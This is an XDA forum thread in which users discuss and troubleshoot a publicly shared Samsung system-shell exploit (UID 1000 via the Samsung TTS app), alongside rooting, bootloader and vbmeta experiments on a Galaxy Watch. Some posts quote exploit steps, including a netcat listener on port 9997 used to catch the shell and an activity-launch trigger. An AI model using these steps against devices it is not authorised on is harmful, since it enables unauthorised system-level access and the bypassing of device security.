How To Guide System Shell Exploit - ALL Samsung Mobile Devices NO BL UNLOCK REQUIRED.

Search This thread

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
I have not removed eToken crap...

My stupid Bootloader sboot.bin ONLY checks text string...

If "he" find mrk text string... then I can flash with Odin...

If FACtory text string fac...

Then blocked... by sboot.bin Exynos Bootloader...

But again...

My Bootloader sboot.bin is unlocked... AND vbmeta.img is patched by Magisk...
Or you can do it manually... because only 1 Byte...

This is no Rocket Science to change text... from same size...


Also my GW4 SM-R870 and SM-R875F allows Bootloader downgrade...

So full Rollback is possible... including ALL files and partitions... with Odin + USB cable.

IMHO Phones especially modern Samsung Phones are better protected... so sboot.bin downgrade is maybe close to impossible... if full Knox crap activated...

Best Regards
 
Dec 20, 2010
10
3
Hey all, I've been trying this thing for a few days and made sure to download the current 1/20 bundle

I tried the following

Used the simple mode and get the blank screen and no prompt.

Tried doing it the manual way and was successful but still was met with a blank prompt when running
nc -lp 9997 in one terminal and am start -n com.samsung.SMT/.gui.DownloadList in one terminal and am start -n com.samsung.SMT/.gui.DownloadList in the other. I still get hung up...


I restarted USB and WiFi debugging and authorized both my laptop and wifi for USB debugging
Reinstalled lang.poc
Tried to set my wifi to STATIC and IP Address 192.168.2.225
Followed the instructions and made sure CHMOD 777 on adb shell /data/local/tmp/samsungTTSVULN2.apk

I was hoping I can get into system to make a full backup of some Apps on my phone particuarly Dragalia Lost 11GB folder. Would I be able to do that with this?

Phone is S22U bought from Samsung direct with T-Mobile SIM if that helps any
 
Last edited:

subevilx

Member
Dec 30, 2022
31
8
I have not removed eToken crap...

My stupid Bootloader sboot.bin ONLY checks text string...

If "he" find mrk text string... then I can flash with Odin...

If FACtory text string fac...

Then blocked... by sboot.bin Exynos Bootloader...

But again...

My Bootloader sboot.bin is unlocked... AND vbmeta.img is patched by Magisk...
Or you can do it manually... because only 1 Byte...

This is no Rocket Science to change text... from same size...


Also my GW4 SM-R870 and SM-R875F allows Bootloader downgrade...

So full Rollback is possible... including ALL files and partitions... with Odin + USB cable.

IMHO Phones especially modern Samsung Phones are better protected... so sboot.bin downgrade is maybe close to impossible... if full Knox crap activated...

Best Regards
I tried this i was able to flash my boot.img and recovery but i got stuck on download mode then decided to do it for the whole file then I started getting secure boot fail for all files except boot and recovery i did this on a combination file any way to fix secure check?
 
  • Like
Reactions: adfree

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
@subevilx
Now we come closer to Rocket Science... because damn Crypto...

Other files also different secured... Minimum by Samsung signing stuff...

For instance I have no idea how to disable Security check in:
Code:
vbmeta_system.img

Similar to vbmeta.img... which holds Security info for boot.img and recovery.img

Then I could flash modified super.img... in theory...

Maybe somebody have an idea. As my Bootloader has no Fastboot Support...
Only FACtory sboot.bin has Fasboot...

Best Regards
 

Moshe fasten

Member
Feb 8, 2015
8
2
Someone may have already asked this question: but with this exploit, is there a way to enable call recording without changing to a different CSC? and if so how?
 
  • Like
Reactions: GodsendNYCc

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Memo to me...

Will try this week, what happens if I copy su into:
Code:
/system/bin

Sorry, the test device is GW4 SM-R875F allready rooted with Magisk 25.2...
Bootloader sboot.bin is unlocked
vbmeta.img is patched by Magisk
boot.img is patched by Magisk

I have read AND write access...
Thanx to Magisk

Step 1.

Code:
freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk

For later to make the chmod Command correct...
For my tiny Windows Brain I need chmod calculator like this...


I have allready copied the working su Binary.... ehm... from Magisk...

Step 2.

I have to prepare few things...

But IMHO test 1 is writing boot.img and vbmeta.img from Stock Firmware... via Odin.

To check if my SM-R875F detect the modified super.img...

Only as stupid test...

Best Regards

Edit 1.

First attempts... to make it easier for me, as su as symlink allready exists... renamed into su2

Code:
D:\Android\adb>adb push su2 /sdcard
su2: 1 file pushed, 0 skipped. 2.8 MB/s (154452 bytes in 0.052s)

D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /sdcard
freshul:/sdcard # ls -a1l su
-rw------- 1 u0_a118 u0_a118 154452 2023-01-22 22:16 su
freshul:/sdcard # ls -a1l su2
-rw------- 1 u0_a118 u0_a118 154452 2023-01-22 22:17 su2
freshul:/sdcard # mount -vo remount,rw /
try '/dev/block/dm-0' type 'ext4' on '/'
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # cd /sdcard
freshul:/sdcard # cp su2 /system/bin
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 6775 su2
freshul:/system/bin # ls -a1l su2
-rwsrwsr-x 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin #

Okidoki... lazy me took chmod command from other Thread...

Need correct chmod for su2 to have same like su shows...

Edit 2.

Stupid mewinfanboy... lt could be from symlink... so maybe chmod 777 is enough... hopefully...

Code:
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 6775 su2
freshul:/system/bin # ls -a1l su2
-rwsrwsr-x 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 777 su2
freshul:/system/bin # ls -a1l su2
-rwxrwxrwx 1 root root 154452 2023-01-25 06:58 su2

Now will Factory Reset and boot... and try su without Magisk APK...


Edit 3.

Maybe i shoot in my own knie by playing before with few reboot Commands...
like reb..t secure

Because this funny Icon with x.... and I was not able to Factory Reset from menu... but from Recovery...
Puh... need to check how I can remove this...

Code:
D:\Android\adb>adb shell
freshul:/ $ su2
/system/bin/sh: su2: inaccessible or not found
127|freshul:/ $ cd /system/bin
freshul:/system/bin $ ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin $ ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 07:16 su -> ./magisk
freshul:/system/bin $ su
Permission denied

Edit 4.

Interesting the symlink allready exists... so not the Magisk APK generates this...

Edit 5.

Okidoki... also after full activating Magisk with APK my su2 is missing...
Code:
freshul:/ $ su
Permission denied
13|freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 07:37 su -> ./magisk

So I need undo my stupid things before... to get rid of secure blabla...

I hope Bootloader lock unlock do this for me...

Edit 6.

Need some sleep... Watch need charging battery...

At the moment I have flashed back Original vbmeta.img and boot.img.. did few times Bootloader lock unlock...
Now only Bootloader is unlocked... Original boot.img... and only patched:
Code:
vbmeta.img

Watch is starting... and accept my "modified" super.img... its not dream because I have insert APks and deleted few files...
Will try next days to understand what happens to su2...
 

Attachments

  • Screenshot_20230125_071940_sysui.png
    Screenshot_20230125_071940_sysui.png
    34.2 KB · Views: 34
Last edited:
  • Like
Reactions: Jacob1004

javadahut

Member
Aug 26, 2015
38
17
Could someone confirm having similar issue?

Failure [INSTALL_FAILED_BLOCKED_CROSS_DOWN: INSTALL_FAILED_BLOCKED_CROSS_DOWN] ROLLBACK FAILED

I tried manually installing SMT recommended version but after adb uninstall and uninstalling updates and resetting it doesn't work when I try to manually install it throws an error, though after few moments get voice data menu and as far as I get is lang.poc after nothing else also
Confirmed, I have the same issue.

Android 13
Nov 2022 Security Patch
Default SMT system app v3.3.02.75
 

mohitgalaxy3

Senior Member
Apr 18, 2011
1,944
539
34
Kuala Lumpur
Samsung Galaxy S21 Ultra
So trying to find how can i further improve network issues or find the difference between global and Korean model. Found that it doesn't support secondary 4G/LTE, though not sure the info is correct or not.
 

Attachments

  • Screenshot_20230125_191710_Chrome.jpg
    Screenshot_20230125_191710_Chrome.jpg
    269.7 KB · Views: 68
  • Screenshot_20230125_191820_Chrome.jpg
    Screenshot_20230125_191820_Chrome.jpg
    356.6 KB · Views: 68

profi_fahrer

Senior Member
Jul 19, 2016
297
118
Wels
Sadly, I can't get it working. It basicly stops after opening the two shells with the commands. The easy method is unable to access the needed DLLs, even with Windows Defender turned completly off.

Is the "K0mraids_POC.apk" supposed to show a blank screen on startup, or should it load something else?
 

Attachments

  • Screenshot_20230125_185721_langpoc.png
    Screenshot_20230125_185721_langpoc.png
    47.2 KB · Views: 66

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Somebody forked... whatever this means... and created exploit.sh...

Ehmmm... I am tooo blind to find this Shell Script.

Can somebody please help to find this?

Thanx in advance.

Best Regards

Edit 1.

Oh great... EXE AND Avira crashed on my old Notebook...

Edit 2.

The good news... for me.

SM-R860 tested also with "new" Firmware GWA3 successfully.

"""Security crap""" from January 2023...

So in theory also working for GW5... but here nobody confirmed yet...
 
Last edited:

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Please help... need few ideas about folders... from where I can execute Binaries...

Here again stupid test with su as su2 renamed... I can chmod 777 in /cache folder but not execute...

In /cahce I can also mkdir... from system...

adb push su2 to /sdcard i did from other adb Window... as normal user...

This output only from system shell...

Code:
S/system/bin/sh: can't find tty fd: No such device or address
/system/bin/sh: warning: won't have full job control
:/ $ ls
ls: .: Permission denied
1|:/ $ cd /data/local/tmp
/system/bin/sh: <stdin>[2]: cd: /data/local/tmp: Permission denied
2|:/ $ cd /data/local/
:/data/local $ ls
ls: .: Permission denied
1|:/data/local $ mkdir test1
mkdir: 'test1': Permission denied
1|:/data/local $ cd ..
:/data $ mkdir test1
mkdir: 'test1': Permission denied
1|:/data $ whoami
system
:/data $ cd ..
:/ $ ls
ls: .: Permission denied
1|:/ $ fd -h
/system/bin/sh: <stdin>[11]: fd: inaccessible or not found
127|:/ $ df -h
Filesystem                                          Size  Used Avail Use% Mounted on
/dev/block/dm-0                                     3.4G  3.3G   99M  98% /
tmpfs                                               646M  1.2M  645M   1% /dev
tmpfs                                               646M     0  646M   0% /mnt
/dev/block/dm-1                                      84M   81M  1.3M  99% /vendor
/dev/block/dm-2                                     169M  169M     0 100% /product
/dev/block/dm-3                                     3.9M  984K  2.9M  25% /odm
/dev/block/platform/10500000.dwmmc0/by-name/prism   581M  179M  390M  32% /prism
/dev/block/platform/10500000.dwmmc0/by-name/optics   39M  500K   37M   2% /optics
tmpfs                                               646M     0  646M   0% /apex
/dev/block/by-name/omr                               16M   24K   15M   1% /omr
/dev/block/platform/10500000.dwmmc0/by-name/cache   193M  6.0M  183M   4% /cache
/dev/block/platform/10500000.dwmmc0/by-name/sec_efs 3.8M  1.3M  2.3M  37% /efs
/dev/fuse                                           8.3G  701M  7.5G   9% /storage/emulated
:/ $ cd /sdcard
:/sdcard $ ls
Alarms
Android
Audiobooks
DCIM
Documents
Download
Movies
Music
Notifications
Pictures
Podcasts
Ringtones
:/sdcard $ ls -a1l
total 36
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw 3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117  3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw 3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117  3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Ringtones
:/sdcard $ ls -a1l
total 188
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw   3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw   3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Ringtones
-rw------- 1 u0_a117  u0_a117  154452 2023-01-22 22:17 su2
:/sdcard $ chmod 777 su2
:/sdcard $ ls -a1l
total 188
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw   3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw   3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Ringtones
-rw------- 1 u0_a117  u0_a117  154452 2023-01-22 22:17 su2
:/sdcard $ ./su2
/system/bin/sh: <stdin>[18]: ./su2: can't execute: Permission denied
126|:/sdcard $ ./su2
/system/bin/sh: <stdin>[18]: ./su2: can't execute: Permission denied
126|:/sdcard $ cd /cache
:/cache $ ls -a1l
total 48
drwxrwx---  7 system cache   4096 2023-01-25 08:02 .
drwxr-xr-x 27 root   root    4096 2008-12-31 15:00 ..
d?????????  ? ?      ?          ?                ? backup
drwx------  2 system system  4096 2023-01-25 08:02 backup_stage
drwxrwx---  2 system system  4096 2023-01-25 08:02 fota
drwxrwx---  2 root   root   16384 2023-01-25 08:02 lost+found
drwxrwx---  2 system cache   4096 2023-01-26 01:52 recovery
:/cache $ mkdir test1
:/cache $ ls -a1l
total 52
drwxrwx---  8 system cache   4096 2023-01-26 02:10 .
drwxr-xr-x 27 root   root    4096 2008-12-31 15:00 ..
d?????????  ? ?      ?          ?                ? backup
drwx------  2 system system  4096 2023-01-25 08:02 backup_stage
drwxrwx---  2 system system  4096 2023-01-25 08:02 fota
drwxrwx---  2 root   root   16384 2023-01-25 08:02 lost+found
drwxrwx---  2 system cache   4096 2023-01-26 01:52 recovery
drwx------  2 system system  4096 2023-01-26 02:10 test1
:/cache $ cd /sdcard
:/sdcard $ cp su2 /cache
:/sdcard $ cd /cache
:/cache $ ls -a1l su2
-rw------- 1 system system 154452 2023-01-26 02:11 su2
:/cache $ chmod 777 su2
:/cache $ ls -a1l su2
-rwxrwxrwx 1 system system 154452 2023-01-26 02:11 su2
:/cache $ ./su2
/system/bin/sh: <stdin>[29]: ./su2: can't execute: Permission denied
126|:/cache $ su2
/system/bin/sh: <stdin>[30]: su2: inaccessible or not found
127|:/cache $ /cache/su2
/system/bin/sh: <stdin>[31]: /cache/su2: can't execute: Permission denied


Maybe other usefull Binaries possible to run... or some *.sh shell scripts...

Thanx for every idea...

If we can not access to /system/bin... then maybe we can Copy and Paste to other path and run...

Who knows....:alien:

Best Regards

Edit 1.

Google search...

Code:
/data/bin

Hmmm... seems not exists in my device... I can not mkdir bin in /data

Edit 2.

From ADB Window...
Code:
freshul:/sdcard $ ls
Alarms  Android  Audiobooks  DCIM  Documents  Download  Movies  Music  Notifications  Pictures  Podcasts  Ringtones  su2
freshul:/sdcard $ cp su2 /data/local/tmp
freshul:/sdcard $ cd /data/local/tmp
freshul:/data/local/tmp $ ls -a1l
total 15758
drwxrwx--x 2 shell shell     3452 2023-01-26 02:37 .
drwxr-x--x 4 root  root      3452 2023-01-25 08:02 ..
-rw-rw-rw- 1 shell shell 15955101 2023-01-18 17:08 samsungTTSVULN2.apk
-rw------- 1 shell shell   154452 2023-01-26 02:37 su2
freshul:/data/local/tmp $ chmod 777 su2
freshul:/data/local/tmp $ ls -a1l
total 15758
drwxrwx--x 2 shell shell     3452 2023-01-26 02:37 .
drwxr-x--x 4 root  root      3452 2023-01-25 08:02 ..
-rw-rw-rw- 1 shell shell 15955101 2023-01-18 17:08 samsungTTSVULN2.apk
-rwxrwxrwx 1 shell shell   154452 2023-01-26 02:37 su2

Edit 3.

Hmmmmmmmmmm... from ADB Window...
Code:
freshul:/data/local/tmp $ /data/local/tmp/su2
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 -version
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 -h
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 --help
su2: applet not found

This su is taken from Magisk 25.2 ... will check some easier Binary...

Edit 4.

after found this...

Tried via system shell...
Code:
:/data/user/0 $ ls
android
com.acr.shellterminalemulator
com.android.backupconfirm
com.android.bluetooth
com.android.captiveportallogin
com.android.carrierconfig
com.android.cellbroadcastreceiver
com.android.certinstaller
com.android.companiondevicemanager
com.android.cts.ctsshim
com.android.cts.priv.ctsshim
com.android.dynsystem
com.android.hotspot2.osulogin
com.android.inputdevices
com.android.keychain
com.android.localtransport
com.android.location.fused
com.android.managedprovisioning
com.android.mms.service
com.android.modulemetadata
com.android.mtp
com.android.networkstack.inprocess
com.android.networkstack.permissionconfig
com.android.networkstack.tethering.inprocess
com.android.nfc
com.android.phone
com.android.providers.blockednumber
com.android.providers.calendar
com.android.providers.downloads
com.android.providers.media
com.android.providers.media.module
com.android.providers.settings
com.android.providers.telephony
com.android.providers.userdictionary
com.android.se
com.android.server.telecom
com.android.shell
com.android.soundpicker
com.android.statementservice
com.android.vending
com.android.wallpaperbackup
com.android.wearable.resources
com.android.wifi.resources
com.corproxy.files
com.google.android.apps.maps
com.google.android.apps.messaging
com.google.android.apps.wearable.retailattractloop
com.google.android.apps.wearable.settings
com.google.android.apps.wearable.systemui
com.google.android.apps.work.clouddpc
com.google.android.clockwork.oemsetup
com.google.android.ext.services
com.google.android.ext.shared
com.google.android.gms
com.google.android.gsf
com.google.android.marvin.talkback
com.google.android.networkstack.tethering.overlay
com.google.android.overlay.modules.cellbroadcastreceiver
com.google.android.packageinstaller
com.google.android.partnersetup
com.google.android.permissioncontroller
com.google.android.tts
com.google.android.wearable.ambient
com.google.android.wearable.app
com.google.android.wearable.app.overlay.refsysui.default
com.google.android.wearable.assistant
com.google.android.wearable.batteryservices
com.google.android.wearable.frameworkpackagestubs
com.google.android.wearable.healthservices
com.google.android.wearable.overlay.home.merlot
com.monotype.android.font.chococooky
com.monotype.android.font.cooljazz
com.monotype.android.font.foundation
com.monotype.android.font.rosemary
com.monotype.android.font.samsungone
com.samsung.SMT
com.samsung.SMT.lang.poc
com.samsung.aasaservice
com.samsung.accessibility
com.samsung.advancedcallservice
com.samsung.advp.imssettings
com.samsung.android.aircommandmanager
com.samsung.android.app.contacts
com.samsung.android.app.esimkeystring
com.samsung.android.app.reminder
com.samsung.android.app.routines
com.samsung.android.app.telephonyui
com.samsung.android.apps.wearable.recent
com.samsung.android.batterysavingsettings
com.samsung.android.bixby.agent
com.samsung.android.bixby.wakeup
com.samsung.android.calendar
com.samsung.android.cidmanager
com.samsung.android.clientconnection
com.samsung.android.dialer
com.samsung.android.dqagent
com.samsung.android.gallery.watch
com.samsung.android.honeyboard
com.samsung.android.incallui
com.samsung.android.location.locproxy
com.samsung.android.mcfds
com.samsung.android.mdecservice
com.samsung.android.mediacontroller
com.samsung.android.messaging
com.samsung.android.networkstack
com.samsung.android.providers.contacts
com.samsung.android.providers.factory
com.samsung.android.samsungnetworklocation
com.samsung.android.samsungpay.gear
com.samsung.android.scloud
com.samsung.android.sdk.handwriting.watch
com.samsung.android.service.health
com.samsung.android.shealthmonitor
com.samsung.android.smartgesture
com.samsung.android.stextclassifier
com.samsung.android.storage.watchstoragemanager
com.samsung.android.video.wearable
com.samsung.android.watch.alarm
com.samsung.android.watch.cameracontroller
com.samsung.android.watch.compass
com.samsung.android.watch.findmyphone
com.samsung.android.watch.findmywatch
com.samsung.android.watch.flashlight
com.samsung.android.watch.runestone.app
com.samsung.android.watch.safety_assistance
com.samsung.android.watch.screencapture
com.samsung.android.watch.stf
com.samsung.android.watch.stopwatch
com.samsung.android.watch.timer
com.samsung.android.watch.watchface.analogmodular
com.samsung.android.watch.watchface.analoguefont
com.samsung.android.watch.watchface.animal
com.samsung.android.watch.watchface.aremoji
com.samsung.android.watch.watchface.basicclock
com.samsung.android.watch.watchface.basicdashboard
com.samsung.android.watch.watchface.bespoke
com.samsung.android.watch.watchface.bitmoji
com.samsung.android.watch.watchface.companionhelper
com.samsung.android.watch.watchface.digitalfont
com.samsung.android.watch.watchface.digitalmodular
com.samsung.android.watch.watchface.dualwatch
com.samsung.android.watch.watchface.emergency
com.samsung.android.watch.watchface.endangeredanimal
com.samsung.android.watch.watchface.healthmodular
com.samsung.android.watch.watchface.large
com.samsung.android.watch.watchface.livewallpaper
com.samsung.android.watch.watchface.myphoto
com.samsung.android.watch.watchface.mystyle
com.samsung.android.watch.watchface.premiumanalog
com.samsung.android.watch.watchface.simpleanalogue
com.samsung.android.watch.watchface.simpleclassic
com.samsung.android.watch.watchface.simplecomplication
com.samsung.android.watch.watchface.superfiction
com.samsung.android.watch.watchface.tickingsound
com.samsung.android.watch.watchface.together
com.samsung.android.watch.watchface.typography
com.samsung.android.watch.watchface.weather
com.samsung.android.watch.weather
com.samsung.android.watch.worldclock
com.samsung.android.wcs.extension
com.samsung.android.wear.blockednumber
com.samsung.android.wear.calculator
com.samsung.android.wear.musictransfer
com.samsung.android.wear.shealth
com.samsung.android.wear.voicerecorder
com.samsung.android.wearable.music
com.samsung.android.wearable.samsungaccount
com.samsung.android.wearable.setupwizard
com.samsung.android.wearable.sysui
com.samsung.euicc
com.samsung.euicc.wmservice
com.samsung.packageinstalleroverlay
com.samsung.sec.android.application.csc
com.samsung.sree.classic
com.samsung.sree.countdown
com.samsung.sree.digital
com.samsung.sree.spin
com.samsung.wear.contacts.sync
com.sds.emm.cloud.knox.samsung
com.sec.android.RilServiceModeApp
com.sec.android.app.bluetoothtest
com.sec.android.app.factorykeystring
com.sec.android.app.factorymode
com.sec.android.app.hwmoduletest
com.sec.android.app.parser
com.sec.android.app.personalization
com.sec.android.app.servicemodeapp
com.sec.android.app.wlantest
com.sec.android.diagmonagent
com.sec.android.easyMover
com.sec.android.sdhms
com.sec.android.soagent
com.sec.app.RilErrorNotifier
com.sec.automation
com.sec.bcservice
com.sec.factory
com.sec.hiddenmenu
com.sec.imsservice
com.sec.location.nfwlocationprivacy
com.sec.modem.settings
com.sec.phone
com.sec.usbsettings
com.sem.factoryapp
com.skms.android.agent
com.wssyncmldm
de.szalkowski.activitylauncher
:/data/user/0 $

:/data/user/0 $ cd /sdcard
:/sdcard $ cp su2 /data/user/0
cp: /data/user/0/su2: Permission denied
 
Last edited:

subevilx

Member
Dec 30, 2022
31
8
@subevilx
Now we come closer to Rocket Science... because damn Crypto...

Other files also different secured... Minimum by Samsung signing stuff...

For instance I have no idea how to disable Security check in:
Code:
vbmeta_system.img

Similar to vbmeta.img... which holds Security info for boot.img and recovery.img

Then I could flash modified super.img... in theory...

Maybe somebody have an idea. As my Bootloader has no Fastboot Support...
Only FACtory sboot.bin has Fasboot...

Best Regards
1674751724789.png

I cant go beyond this if I change even one bit in a file im stuck on file analysis any help?
 

mauricio1352

New member
Jan 8, 2015
2
0
is there any way to contact you? I have an A71 with KG LOCKED, it would be interesting to test some commands on it, to see if I can get KG COMPLETED, just like yours🙂
 

Tofor

Senior Member
May 18, 2017
52
10
Samsung Galaxy Tab A8
sorry to bust in here and ask something somewhat off subject. But i was curious how you got the cmds for opening the hidden menus? What do all the numbers at the end stand for? I'm asking because there has always been something that has come up in my list of secret codes for samsung. near the end of the list there comes some secret codes that are in all caps letters. one such code that is on all my unlockable devices is *#UNLOCKKERNEL#. its part of the IOT hidden menu. but i cant find any such option inside the hidden menu itself. Curious if it could be executed the same way as you did for the other parts of the IOT Hidden Menu. to me. unlock kernel will either unlock the bootloader. or it will make the kernel debuggable. either would be awesome. Thanks for any light you can shed on this secret code.
 

Tofor

Senior Member
May 18, 2017
52
10
Samsung Galaxy Tab A8
sorry to bust in here and ask something somewhat off subject. But i was curious how you got the cmds for opening the hidden menus? What do all the numbers at the end stand for? I'm asking because there has always been something that has come up in my list of secret codes for samsung. near the end of the list there comes some secret codes that are in all caps letters. one such code that is on all my unlockable devices is *#UNLOCKKERNEL#. its part of the IOT hidden menu. but i cant find any such option inside the hidden menu itself. Curious if it could be executed the same way as you did for the other parts of the IOT Hidden Menu. to me. unlock kernel will either unlock the bootloader. or it will make the kernel debuggable. either would be awesome. Thanks for any light you can shed on this secret code.
note. this secret code did not appear on my device until i used the system shell to enable the hidden menus
 

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Code:
D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # mount -vo remount,rw /
try '/dev/block/dm-0' type 'ext4' on '/'
freshul:/ # cd /sdcard
freshul:/sdcard # ls -a1l su2
-rw------- 1 u0_a117 u0_a117 154452 2023-01-22 22:17 su2
freshul:/sdcard # cp su2 /system/bin
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-27 04:21 su2
freshul:/system/bin # chmod 777 su2
freshul:/system/bin # ls -a1l su2
-rwxrwxrwx 1 root root 154452 2023-01-27 04:21 su2
freshul:/system/bin # reboot



D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # exit
1|freshul:/ $ exit

D:\Android\adb>adb pull /sdcard .\dump
/sdcard/: 147 files pulled, 0 skipped. 2.6 MB/s (117491085 bytes in 42.623s)

D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /sdcard
freshul:/sdcard # cp su2 /cache
freshul:/sdcard # cd /cache
freshul:/cache # ls -a1l su2
-rw------- 1 root root 154452 2023-01-27 04:48 su2
freshul:/cache # chmod 777 su2
freshul:/cache # ls -a1l su2
-rwxrwxrwx 1 root root 154452 2023-01-27 04:48 su2
freshul:/cache # /cache/su2 --help
su2: applet not found


Tried short again today...
On my Magisk rooted SM-R875F...

this time only rebooted after copied su2 into /system/bin

su2 is gone...

I am now trying to check what is in Log files... To find the "self cleaning"...

Also short tried same su2 from /cache folder with same result I know...

Plan for next days... flash normal unmodified Original Stock Firmware... and check other Binaries in /cache folder with system user...

Best Regards
 
  • Like
Reactions: mohitgalaxy3

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22

What is with lpflash...
Code:
lpflash writes a non-sparse image from lpmake to a block device. It is intended to be run on the device itself.

Usage: lpflash /dev/block/sdX /path/to/image/file

Maybe this could be usefull... to prepare modified super.img...

Maybe this bypass Combination Firmware "problem"...

I need only to bring super.img to my SM-R875F...

boot.img and recovery.img I can flash via Odin...

Best Regards
 

Top Liked Posts

  • There are no posts matching your filters.
  • 32
    THIS IS ACTIVELY IN DEVELOPMENT - Our goal is to make it more user friendly. and easier to use, so please note things will change and updates will come at any given time, and there is almost certainly bugs to be found and encountered along the way during this, so if you find issues, just let us know here or in support chat, we are VERY active, and can usually get back to you in a few mins. I Will be dynamically updating this post as things progress, keeping it up-to-date with our current progress.


    --UPDATED 01/20/2023: 1:20PM CST PROJECT VERSION 4.5 -- (Fixed Port issues) --

    Also confirmed working on Watch.. as mentioned, here.
    This is an EXPLOIT to get a System based shell (UID 1000) on ANY Samsung Mobile Device. No clue if or when it will be patched, but has worked on every single Samsung Device tested so far.
    THIS IS THE EQUILIVELENT OF DOING su system but this DOES NOT invoke or need "su" in any way.
    This DOES NOT trip Knox.
    This DOES NOT give you ROOT (UID 0)

    This DOES NOT directly unlock your bootloader, although you may be able to find a way to do so using this exploit as a tool.
    If you use this for your own works, Please give credit.

    Next best thing to root on devices without BootLoader Unlock Option.


    Cool things that work:
